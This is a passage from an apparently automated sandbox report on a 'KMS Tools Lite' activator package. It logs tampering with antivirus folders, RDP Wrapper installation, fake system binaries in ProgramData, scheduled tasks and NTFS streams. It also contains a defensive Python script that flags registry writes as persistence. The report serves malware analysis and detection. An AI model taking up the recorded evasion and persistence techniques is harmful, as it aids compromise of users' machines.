File opened for modification C:\Program Files\ReasonLabs C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\RDP Wrapper\rdpwrap.ini C:\ProgramData\Setup\smss.exe N/A
File created C:\Program Files\RDP Wrapper\rdpwrap.ini C:\ProgramData\RDPWinst.exe N/A
File opened for modification C:\Program Files\COMODO C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\DrWeb C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\SpeedFan C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\GPU Temp C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\360 C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Common Files\AV C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Panda Security C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\IObit C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Transmission C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\RDP Wrapper C:\ProgramData\Setup\smss.exe N/A
File opened for modification C:\Program Files\Malwarebytes C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\HitmanPro C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Kaspersky Lab C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Bitdefender Agent C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Wise C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ByteFence C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\Cezurity C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Rainmeter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\ESET C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SUPERAntiSpyware C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\MSI\MSI Center C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\NETGATE C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Enigma Software Group C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\SpyHunter C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\AVG C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files\Ravantivirus C:\ProgramData\Setup\update.exe N/A
File opened for modification C:\Program Files (x86)\IObit\IObit Malware Fighter C:\ProgramData\Setup\update.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-fr.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-te.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\nl\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-as.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\auto_open_controller.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\fi\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\nl\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\id\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Mini-Wallet\miniwallet.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-icon.svg C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-992.268aa821c3090dce03cb.chunk.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-NL C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\fi\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\zh-Hans\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_driver.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\edge_driver.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-ec\cs\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\fr-CA\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification_fast.bundle.js.LICENSE.txt C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Tokenized-Card\tokenized-card.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\wallet-webui-708.de49febeeb0e9c77883f.chunk.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ar\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\cs\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\de\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\es\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-mn-cyrl.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-DE C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\it\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ar\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\fr-CA\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\fr\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-checkout\merchant-site-info.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-de-1996.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\runtime.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1498492656\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-bg.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\product_page.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-hub\hu\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-shared-components\pt-BR\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-tokenized-card\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_653919595\Part-FR C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_2024013401\sets.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_1972247359\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\wallet\wallet-notification-config.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\Notification\notification.html C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_762528129\edge_checkout_page_validator.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\bnpl\bnpl.html C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification\sv\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\el\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping468_693472959\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_700750315\deny_etld1_domains.list C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_970595340\hyph-sl.hyb C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\crypto.bundle.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-mobile-hub\ru\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\de\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1188_782306747\json\i18n-notification-shared\zh-Hans\strings.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\SYSTEM32\netsh.exe N/A
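Note on reading this table: the three rows are netsh.exe opening, querying and enumerating its own helper key. netsh does exactly that on every launch to find the helper DLLs it should load, so these rows prove that netsh ran (consistent with the "Modifies Windows Firewall" signature in the summary), not that a helper was registered. A registration would show up as a "Set value" or "Key created" row under the same key. The following Python is an added example, not part of the sandbox report: it separates read operations from write operations under a few registry extension points and reports only writes as persistence. The three netsh rows are copied from the table; the "helper.dll" registration row is constructed to show what a positive result looks like, and the set of monitored keys is this example's own choice.

```python
from dataclasses import dataclass

# Extension points that netsh, Winlogon and the shell read at start-up.
# This selection is the example's own, not the sandbox's signature list.
PERSISTENCE_KEYS = {
    r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh": "Netsh Helper DLL (T1546.007)",
    r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon": "Winlogon (T1547.004)",
    r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run": "Run key (T1547.001)",
}

# Read operations: netsh.exe performs these on every launch to find the
# helper DLLs it should load, so on their own they only prove netsh ran.
READ_OPS = {"Key opened", "Key queried", "Key value queried", "Key value enumerated"}
# Write operations: the only way a new helper (or Winlogon/Run entry) appears.
WRITE_OPS = {"Key created", "Set value", "Key deleted", "Value deleted"}


@dataclass(frozen=True)
class RegEvent:
    op: str         # the report's Description column, e.g. "Key opened"
    indicator: str  # the report's Indicator column (registry path)
    process: str    # the report's Process column


def persistence_key_for(indicator: str):
    """Return the label of the extension point the indicator lives under, or None."""
    upper = indicator.upper()
    for key, label in PERSISTENCE_KEYS.items():
        if upper.startswith(key.upper()):
            return label
    return None


def normalise_op(op: str) -> str:
    """Collapse 'Set value (str)' / 'Set value (int)' into 'Set value'."""
    return "Set value" if op.startswith("Set value") else op


def triage(events):
    """Group events per extension point and separate reads from writes.

    Returns {label: {"reads": count, "writes": [(process, indicator), ...]}}.
    Operations outside READ_OPS/WRITE_OPS are ignored rather than guessed at.
    """
    out = {}
    for ev in events:
        label = persistence_key_for(ev.indicator)
        if label is None:
            continue
        bucket = out.setdefault(label, {"reads": 0, "writes": []})
        op = normalise_op(ev.op)
        if op in READ_OPS:
            bucket["reads"] += 1
        elif op in WRITE_OPS:
            bucket["writes"].append((ev.process, ev.indicator))
    return out


def verdicts(events):
    """One human-readable line per extension point touched."""
    lines = []
    for label, b in triage(events).items():
        if b["writes"]:
            procs = ", ".join(sorted({p for p, _ in b["writes"]}))
            lines.append(f"{label}: {len(b['writes'])} write(s) by {procs}; review the values")
        else:
            lines.append(f"{label}: {b['reads']} read(s) only; nothing registered")
    return lines


NETSH = r"C:\Windows\SYSTEM32\netsh.exe"
NETSH_KEY = r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh"

# The three rows from the table above.
REPORT_EVENTS = [
    RegEvent("Key opened", NETSH_KEY, NETSH),
    RegEvent("Key queried", NETSH_KEY, NETSH),
    RegEvent("Key value enumerated", NETSH_KEY, NETSH),
]

# Constructed row (NOT observed in this run): what a genuine helper
# registration would look like in the same table format.
CONSTRUCTED_REGISTRATION = RegEvent(
    "Set value (str)",
    NETSH_KEY + r"\helper = " + '"C:\\ProgramData\\Setup\\helper.dll"',
    r"C:\ProgramData\Setup\install.exe",
)

if __name__ == "__main__":
    for line in verdicts(REPORT_EVENTS):
        print(line)
    for line in verdicts(REPORT_EVENTS + [CONSTRUCTED_REGISTRATION]):
        print(line)
```

Run as-is it prints "3 read(s) only" for the observed rows and a write verdict only once the constructed registration row is added. The same read/write split applies to the "Modifies WinLogon" and "Adds Run key" signatures in the summary, where the rows do carry writes.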

Permission Groups Discovery: Local Groups

discovery

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Setup\install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\KMS Tools Lite Portable\Programs\W10 Digital Activation Program\W10DigitalActivation.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Setup\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\RDPWinst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\KMS Tools Lite Portable\GSetup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zaxxx.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Microsoft\win.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows Tasks Service\winserv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Windows Tasks Service\winserv.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Setup\smss.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Setup\smss.exe N/A

Delays execution with timeout.exe

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133895695533523394" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage C:\ProgramData\Setup\smss.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{6D6688C3-7945-484D-B534-F54B959BC780} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3457531954-2054407110-1019940402-1000_Classes\Local Settings C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3457531954-2054407110-1019940402-1000\{B2EED048-F807-45D8-9CDA-850EE2E93D88} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database C:\ProgramData\Setup\smss.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset C:\ProgramData\Setup\smss.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\ProgramData\Setup\winmgmts:\ C:\ProgramData\Setup\IP.exe N/A
File opened for modification C:\ProgramData\Setup\WinMgmts:\ C:\ProgramData\Setup\IP.exe N/A
File opened for modification C:\ProgramData\Setup\winmgmts:\ C:\ProgramData\Setup\smss.exe N/A

Runs net.exe

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\17f790d5-9468-40ac-8b9a-1b672e685976_KMSTools.zip.976\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1baee621-d038-4d45-a4c5-391449c8479b_KMSTools.zip.79b\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zO84806EDE\KMSTools Lite.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\Program Files\7-Zip\7zFM.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
N/A N/A C:\KMS Tools Lite Portable\KMSTools Lite.exe N/A
